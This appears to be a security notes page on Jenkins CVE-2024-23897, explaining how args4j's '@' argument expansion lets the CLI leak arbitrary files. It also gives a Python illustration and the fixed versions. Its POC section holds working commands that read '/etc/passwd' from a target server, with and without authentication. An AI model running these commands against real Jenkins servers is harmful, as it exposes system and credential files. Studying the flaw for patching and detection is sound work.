# Jenkins - CVE-2024-23897

## <mark style="color:red;">Data Leak Vulnerability</mark> (fixed in version 2.442, and LTS 2.426.3)

Using the [Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/), an attacker can read arbitrary files from the file system of the Jenkins controller. Depending on their permissions they get the whole file or only its first lines (see the POC below).

When a CLI command is invoked with arguments, Jenkins parses them with [args4j's](https://github.com/kohsuke/args4j) [parseArgument](https://github.com/jenkinsci/jenkins/blob/master/core/src/main/java/hudson/cli/CLICommand.java#L248), which [calls](https://github.com/kohsuke/args4j/blob/master/args4j/src/org/kohsuke/args4j/CmdLineParser.java#L479) [expandAtFiles](https://github.com/kohsuke/args4j/blob/master/args4j/src/org/kohsuke/args4j/CmdLineParser.java#L548):

```java
private String[] expandAtFiles(String args[]) throws CmdLineException {
    List<String> result = new ArrayList<String>();
    for (String arg : args) {
        if (arg.startsWith("@")) {
            File file = new File(arg.substring(1));
            if (!file.exists())
                throw new CmdLineException(this,Messages.NO_SUCH_FILE,file.getPath());
            try {
                result.addAll(readAllLines(file));
            } catch (IOException ex) {
                throw new CmdLineException(this, "Failed to parse "+file,ex);
            }
        } else {
            result.add(arg);
        }
    }
    return result.toArray(new String[result.size()]);
}
```

The function checks whether an argument starts with the `@` character. If it does, the rest of the argument is treated as a file path, the file is read, and every line of it becomes a new argument in place of the original one.

<figure><img src="https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2F1osLJAYVrsp2AwwUh5bC%2FExpandAtFile_graph.webp?alt=media&#x26;token=c4e5adeb-8c11-4a9c-8f6f-310bc3ed8e88" alt=""><figcaption></figcaption></figure>

This means that an attacker who controls a single argument can have it expanded into the lines of an arbitrary file on the Jenkins controller, one argument per line. Whether the whole file or only its first lines are reflected back depends on the command used and on the attacker's permissions. Jenkins 2.442 and LTS 2.426.3 fix this by disabling the `@` expansion feature in the CLI command parser.
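To make the mechanism concrete, the following Python example (written for this page, not Jenkins or args4j code) mirrors the `expandAtFiles` logic above, puts the pre-fix and post-fix parser behaviour side by side, and models why a caller without Overall/Read only sees the first lines: a command that accepts N positional arguments rejects the (N+1)th one with an error that echoes its value. The `/etc/passwd`-like file contents and the temporary file path are constructed for the demo, and `run_command` is a simplified model of args4j's surplus-argument error, not the real Jenkins command dispatch.

```python
"""Added illustration of the args4j @-file expansion behind CVE-2024-23897.

This is example code written for this page, not Jenkins or args4j source.
It re-implements the expandAtFiles() logic in Python so the behaviour can be
exercised offline against a constructed file, shows the pre-fix and post-fix
parser settings side by side, and models the reason an unauthenticated caller
only sees the first lines. The sample file contents are constructed; they stand
in for /etc/passwd on a Jenkins controller.
"""
import os
import tempfile


class CmdLineException(Exception):
    """Stand-in for org.kohsuke.args4j.CmdLineException."""


def expand_at_files(args, at_syntax=True):
    """Python mirror of args4j CmdLineParser.expandAtFiles().

    at_syntax=True  : pre-fix behaviour; "@<path>" is replaced by the lines of <path>.
    at_syntax=False : behaviour selected by Jenkins 2.442 / LTS 2.426.3, where the
                      @ expansion feature is disabled and the argument is kept verbatim.
    """
    result = []
    for arg in args:
        if at_syntax and arg.startswith("@"):
            path = arg[1:]
            if not os.path.exists(path):
                raise CmdLineException(f"No such file: {path}")
            with open(path, encoding="utf-8") as fh:
                # one new argument per line, as readAllLines() does
                result.extend(line.rstrip("\n") for line in fh)
        else:
            result.append(arg)
    return result


def run_command(positional_slots, argv, at_syntax=True):
    """Simplified model (not Jenkins code) of a CLI command taking a fixed number of positional args.

    After expansion, the first surplus argument is rejected with an error that echoes
    its value. With a file's lines as arguments, a 0-argument command (like who-am-i)
    therefore reflects line 1, a 1-argument command reflects line 2, and so on.
    """
    expanded = expand_at_files(argv, at_syntax)
    if len(expanded) > positional_slots:
        return f"No argument is allowed: {expanded[positional_slots]}"
    return "OK"


SAMPLE_PASSWD = (  # constructed sample data standing in for /etc/passwd
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "bin:x:2:2:bin:/bin:/usr/sbin/nologin\n"
)


def demo():
    """Write the constructed file, run vulnerable and fixed parsers over "@<path>", return results."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False, encoding="utf-8") as fh:
        fh.write(SAMPLE_PASSWD)
        path = fh.name  # hypothetical target path for the demo
    try:
        at_arg = f"@{path}"
        return {
            # authenticated case: every expanded line is handed to the command
            "vulnerable": expand_at_files([at_arg]),
            # unauthenticated case: only the (N+1)th line comes back in the error
            "first_line_leak": run_command(0, [at_arg]),
            "second_line_leak": run_command(1, [at_arg]),
            # post-fix: the argument stays a literal "@<path>" and no file is read
            "fixed": expand_at_files([at_arg], at_syntax=False),
            "fixed_error": run_command(0, [at_arg], at_syntax=False),
        }
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it directly to see the three cases: the vulnerable parser returns all three constructed lines, the modelled zero- and one-argument commands echo exactly one line each, and with `@` syntax disabled the argument `@<path>` is passed through as a harmless literal.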

***

### POC

Download the Jenkins CLI tool:

```bash
wget https://xxx.yyy/jnlpJars/jenkins-cli.jar
```

1. **Authenticated** (a user with Overall/Read permission), retrieve the complete file. `connect-node` reports an error for every name it cannot resolve to an agent, so every line of the file is reflected:

```bash
java -jar jenkins-cli.jar -noCertificateCheck -s https://xxx.yyy/jenkins -auth abc:abc connect-node "@/etc/passwd"
```

2. **Unauthenticated**, or authenticated without Overall/Read permission, only the first lines can be read, one line per command:

.. first line:

```bash
java -jar jenkins-cli.jar -noCertificateCheck -s https://xxx.yyy/jenkins who-am-i "@/etc/passwd"
```

.. second line:

```bash
java -jar jenkins-cli.jar -noCertificateCheck -s https://xxx.yyy/jenkins enable-job "@/etc/passwd"
```

.. third line:

```bash
java -jar jenkins-cli.jar -noCertificateCheck -s https://xxx.yyy/jenkins help "@/etc/passwd"
```

***

**Credits:** <https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/>
